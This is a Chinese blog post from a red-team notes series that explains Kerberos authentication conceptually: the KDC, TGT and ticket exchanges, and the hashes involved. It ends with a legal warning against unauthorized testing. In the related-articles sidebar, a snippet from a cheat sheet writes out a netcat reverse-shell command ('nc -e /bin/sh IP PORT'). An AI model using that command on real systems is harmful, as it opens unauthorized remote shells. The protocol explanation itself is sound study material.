红队笔记之Kerberos协议浅析

最新推荐文章于 2024-07-11 00:27:01 发布
最新推荐文章于 2024-07-11 00:27:01 发布
阅读量4k 收藏 4
点赞数
分类专栏: 红队笔记 文章标签: 网络 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/corenote/article/details/121711965
版权

在这里插入图片描述

文章目录


Kerberos是一种由麻省理工研发,用来来保护Project Athena提供的网络服务器。这个协议以希腊神话中的人物Kerberos命名,他在希腊神话中是Ha des的一条凶猛的三头保卫神犬。故Kerberos也被戏称为三只狗头。

Kerberos是一种网络身份验证协议。其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过程的实现

  • 不依赖于主机操作系统的认证
  • 无需基于主机地址的信任
  • 不要求网络上所有主机的物理安全
  • 并假定网络上传送的数据包可以被任意地读取、修改和插入数据

在以上情况下, Kerberos 作为一 种可信任的第三方认证服务,是通过传统的密码技术(如:共享 密钥)执行认证服务的。

Kerberos协议架构 (三只狗头)

Kerberos协议由三部分组成,俗称三只狗头,这三只狗头在整个认证过程有着不同的角色,下面对协议的基本架构进行介绍

  • Client:认证发起方

  • Server:服务提供方

  • KDC(Key Distribution Center) :KDC负责管理票据、认证票据、分发票据,KDC不是一个独立的服务,它主要由两个服务组成:

    • 1、Authentication Service: 为client生成TGT的服务
    • 2、Ticket Granting Service: 为client生成某个服务的ticket
    • 备注1:整个认证的过程中KDC还要与DC(Domain Controller)中的AD(Account Database)进行交互,AD中存储所有Client的白名单,只有存在于白名单的client才能顺利申请到TGT
    • 备注2:KDC服务框架中包含一个默认的KRBTGT账户,其对应的NTLM Hash用例加密生成TGT

image-20211019153248664

Kerberos认证流程

Kerberos认证流程简述

1、Client与AS交互

Client向AS服务请求,希望获取访问Server的权限。 AS得到了这个消息,首先调用AD获取Client白名单,如Client在白名单中则返回TGT给Client。

TGT(Ticket Granting Ticket):入场券,通过入场券能够获得票据,是一种临时凭证。

2、Client与TGS交互

Client得到了TGT后,向TGS发送请求,希望获取访问Server的权限。TGS通过Client发送的TGT进行认证,如认证通过给Client发送可以访问Server的权限ticket。

Ticket:票据,是网络对象互相访问的凭证

3、Client与server交互

Client得到ticket后,将ticket发送给对应Server,Server认证通过后,Client最终获得访问Server权限。

Kerberos认证流程详解

为了表达方便,下文会采用“秘钥(密文)”的方式来表达被某种秘钥加密过的密文,如KEY1(B),将表达被秘钥KEY1加密B所产生的密文

1、Client与AS交互过程(身份认证)

  • Client先向AS发送KRB_AS_REQ,消息主要为明文的用户名信息

    KRB_AS_REQ消息体内容大致为;

    1、Pre-Authentication Data:一个被Client Hash加密的Timestamp.用于AS验证客户端身份

    2、Client Info: Client标识,用于AS查询Client对应的NTLM Hash

    3、Server Info:KDC的Tioket Granting Service

  • AS接到KRB_AS_REQ解析其中的用户名,调用AD进行查询,如用户名不在AD白名单中则认证终止,如在AD白名单中,AD将用户名对应的NTLM Hash发送给AS

  • AS生成一个随机字符串,叫TGS Session Key ,并使用用户名对应的NTLM Hash将Session Key进行加密,后文称Client Hash(TGS Session Key)

  • AS使用其默认账户KRBTGT对应的NTLM Hash对TGS Session Key,Client Info,TGT到期时间进行加密,生成KRBTGT Hash(TGS Session Key,Client Info,TGT到期时间),即TGT

  • AS向Client返回KRB_AS_REP

    KRB_AS_REP消息体内容大致为;

    MSG 1、Client Hash(Session Key):一个被Client Hash加密的Session Key,用于客户端接收后解密出Session Key

    MSG 2、KRBTGT Hash(TGS Session Key,Client Info,TGT到期时间)TGT:用于向TGS服务申请票据的凭证

  • Client使用自己的NTLM Hash解密MSG 1,获取到TGS Session Key,因为无KRBTGT对应的NTLM Hash故无法解析MSG 2获取到TGT

    至此,Client证明了自己的合法身份,并获得了TGT

2、Client与TGS交互过程(服务授权)

  • Client使用使用上一步解析出来的TGS Session Key重新加密Client Info与时间戳, TGS Session Key(Client Info+Timestamp)后文称Authenticator 1

  • Client向TGS发送KRB_TGS_REQ

    KRB_TGS_REQ消息体内容大致为;

    MSG 1、Authenticator 1 :TGS Session Key(Client Info+Timesramp)

    MSG 2、TGT:KRBTGT Hash(session key+client info+TGT到期时间),以及Server Info(要访问的服务)

  • TGS接收到KRB_TGS_REQ后,使用账户KRBTGT对应的NTLM Hash对MSG 2中的TGT进行解密,得到TGS Session Key+client info+TGT到期时间

  • TGS拿到TGS Session Key后解密MSG 1,得到Client Info+Timesramp

  • TGS将TGT中解密出来的client info与MSG 1中解密出来的client info进行比较,如相同则认证通过,并生成一个用于与被访问服务做认证随机字符串,我们称之为Server Session Key

  • TGS使用MSG 2中的Server Info信息从AD中取出Server 对应的NTLM Hash

  • TGS使用Server对应NTLM Hash对Server SessionKey,Client Info,Ticket有效时间进行加密,生成Server Hash(Server SessionKey,Client Info,Ticket有效时间),即Ticket(票据)

  • TGS使用TGS Session Key加密Server Session Key生成TGS Session Key(Server Session Key)

  • TGS向Client发送KRB_TGS_REP

    KRB_TGS_REP消息体内容大致为;

    MSG 1:TGS Session Key(Server Session Key),用于客户端解密出Server Session Key

    MSG 2:Ticket:Server Hash(Server SessionKey,Client Info,Ticket有效时间),用于服务端认证

  • Client收到到KRB_TGS_REP后使用TGS Session Key解析出Server Session Key

至此,Client得到了访问Server的钥匙,Ticket

3、Client与Server交互(服务请求)

  • Client使用上一步解析出来的Server Session Key重新加密Client Info与时间戳,生成Server Session Key(Client Info+Timestamp),后文称Authenticator 2

  • Client向server发送KRB_AP_REQ

    KRB_AP_REQ消息体内容大致为;

    MSG 1、Authenticator 2:Server Session Key(Client Info+Timestamp)

    MSG 2、Ticket:Server Hash(Server SessionKey,Client Info,Ticket有效时间)

  • Server接收到KRB_AP_REQ后使用自己的NTLM Hash对ticket进行解密得到Server SessionKey,Client Info,Ticket有效时间等信息

  • Server使用Server SessionKey解密Authenticator 2得到Client Info

  • 将Ticket解析出来的Client Info与Authenticator 2 中解析出来的Client Info进行比较,如相同则认证通过

  • server使用Server SessionKey加密Authenticator 2 中所含的Timesramp,Server SessionKey(Timestamp)

  • 服务端向Client发送KRB_AP_REP

    KRB_AP_REP消息体内容大致为;

    MSG 1、Server SessionKey(Timesramp)

  • Client接收到KRB_AP_REP后使用Server SessionKey解析出Timestamp,与自己发送的Authenticator 2总所含Timestamp进行比较,如一致,则整个认证流程完成

  • 校验通过后,认证成功,该票据会一直存在客户端内存中。

    至此,Client与Server成功完成了认证

为了您和您家人的幸福,请不要利用文中技术在用户未授权情况下开展渗透测试!!!

《中华人民共和国刑法》

第二百八十五条
违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。
第二百八十六条
违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。

违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。
故意制作、传播计算机病毒等破坏程序,影响计算机系统正常运行,后果严重的,依照第一款的规定处罚

方寸明光
关注
专栏目录
红队内网攻防渗透:内网渗透之Kerberos协议全讲解
HACKONE的博客
04-10 90
红队内网攻防渗透Kerberos协议全讲解 Kerberos协议全讲解
Kerberos 认证协议详解
02-14
Kerberos 协议本身,及其应用场景都进行了详细讲解,不可多得的好文
01、Kerberos安全认证之原理及搭建命令使用学习笔记
最新发布
每个人都是独一无二的,把握好自己的节奏,跟着自己的心走。
07-11 1362
学习kerberos主要原因是目前部门里会有测试kerberos连通性的问题bug,所以以此来系统学习下kerberos安全认证,主要是学习在kerberos安全配置下如何去访问各个大数据组件。
Kerberos协议内容详解
BigData私房菜
09-08 1275
这篇帮助文档是由 Fulvio Ricciardi所写。原文地址https://kerberos.org/software/tutorial.html,目前翻译只校对了1-4章 文章目录1 介绍2 目标3 对象和术语的解释3.1 Realm3.2 Principal3.3 Ticket3.4 加密 Encryption3.4.1 加密类型 Encryption type3.4.2 加密密钥 Encryption key3.4.3 Salt3.4.4 密钥版本号 Key Version Number (kv
技术分享:Kerberos协议详解
边逛边看边学习
02-07 1446
CSDN果然技术大拿如云。前阵子发了一个ClickHouse的干货,阅读量蹭蹭地 本篇作者:擎创科技 大飞哥 介绍 最近工作中经常用到Kerberos认证,虽然一些软件已经实现了Kerberos认证,配置一下就能使用,但是我一直不是很清楚它的具体流程,下面通过分析它的协议(KerberosV5)进一步加深对Kerberos认证的了解。 角色 Kerberos是一种第三方认证协议,通过使用对称加密技术为客户端/服务器应用程序提供强身份验证。在希腊神话中Kerberos是守护地狱之门的一条三头神犬,而.
Kerberos协议详解
鸥鹭忘机
07-15 966
Kerberos认证过程复杂,使用多个密钥,且密钥种类不断变换,以防止网络拦截。使用临时生成的Session key,只在当前会话中使用,保证安全性。即使密钥被劫持,也只能在当前会话中起作用。
红队笔记:技巧,窍门和技巧的串联
02-25
红队笔记 提示,技巧和技巧的串联。 当前主题:文件传输
红队笔记专属-shell备忘录
Gamma_lab的博客
04-02 4300
前言: ​ 建议直接复制粘贴到笔记,或点赞收藏,因为时常会用到,这是整理的一些常见的反向shell和特权提升的笔记文档,红队成员必会! 最全。 反向shell-备忘录: ​ 通常在获得远程代码执行之后,我们希望获得一些交互式访问—而不是发出单个命令获取单个回显或与 web shell 交互,从实战的意义来讲,反弹shell是非常有必要的,以下将从不同的工具出发, nc listen: nc -nlvp PORT connect: nc -e /bin/sh IP PORT or nc -c sh I
红队攻防手册,红队攻防教程
04-20
红队攻防教程是指针对网络和系统安全的实践性培训,旨在模拟真实的攻击场景并提供相关的防御技术。红队是一个模拟攻击团队,通过模拟真实的黑客攻击来测试组织的安全性,而蓝队则是负责防御和应对这些攻击的团队。 ...
红队行动之鱼叉攻击SMTP_Relay.pdf
09-11
红队行动之鱼叉攻击SMTP_Relay】深入解析 红队行动中,鱼叉攻击是一种高度定向的网络攻击手段,通常针对特定的目标,利用SMTP Relay(简单邮件传输协议中继)来实施。SMTP Relay是邮件系统的一个功能,允许邮件...
Kerberos协议安全性分析
12-19
Kerberos协议简介、工作原理、握手过程,及 Kerberos协议面临的安全问题及其安全性分析
Kerberos简介
05-06
Kerberos的简单介绍 Kerberos Kerberos Kerberos Kerberos Kerberos Kerberos Kerberos Kerberos Kerberos Kerberos
内网渗透--Kerberos协议详解
qq_62169455的博客
09-03 644
概述:Kerberos协议是一种网络认证协议,其设计目标是通过密钥系统为客户机/服务器应用程序提供强大的认证服务,该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意的读取、修改和插入数据。在以上的情况下,Kerberos作为一种可信任的第三方认证服务,是通过传统密码技术执行认证服务的。
全网最详细 | Kerberos协议详解
Ms08067安全实验室
02-27 7220
目录Kerberos基础PAC特权属性证书1. PAC结构2. PAC凭证信息3. PAC签名4. KDC验证PAC5. PAC在kerberos中的优缺点Kerberos实验AS-REQ & AS-REP1. AS-REQ请求包分析2. AS-REP回复包分析 (1) TGT认购权证 (2) Lo...
三步轻松理解Kerberos协议
热门推荐
11-02 4万+
Kerberos是一种身份验证协议,它作为一种可信任的第三方认证服务,通过使用对称加密技术为客户端/服务器应用程序提供强身份验证。在域环境下,AD域使用Kerberos协议进行验证,熟悉...
Kerberos安全体系详解---Kerberos的简单实现
weixin_30411819的博客
05-16 548
1. Kerberos简介 1.1. 功能 一个安全认证协议 用tickets验证 避免本地保存密码和在互联网上传输密码 包含一个可信任的第三方 使用对称加密 客户端与服务器(非KDC)之间能够相互验证 Kerberos只提供一种功能——在网络安全的完成用户的身份验证。它并不提供授权功能或者审计功能。 1.2. 概念 ...
安全认证Kerberos详解
Shawn的个人博客
04-16 4160
Kerberos是一种计算机网络认证协议,用来在非安全网络中,对个人通信以安全的手段进行身份认证。这个词又指麻省理工学院为这个协议开发的一套计算机软件。软件设计上采用客户端/服务器结构,并且能够进行相互认证,即客户端和服务器端均可对对方进行身份认证。可以用于防止窃听、防止重放攻击、保护数据完整性等场合,是一种应用对称密钥体制进行密钥管理的系统。
全面整合安全测试字典:渗透与红队必备工具
资源摘要信息:"渗透测试/红队/src全方位测试字典" 知识点: 1. 渗透测试基本概念:渗透测试(Penetration Testing),也称为渗透检测,是一种安全评估方法,通过模拟黑客攻击的方式,评估计算机网络、应用程序或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

方寸明光

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值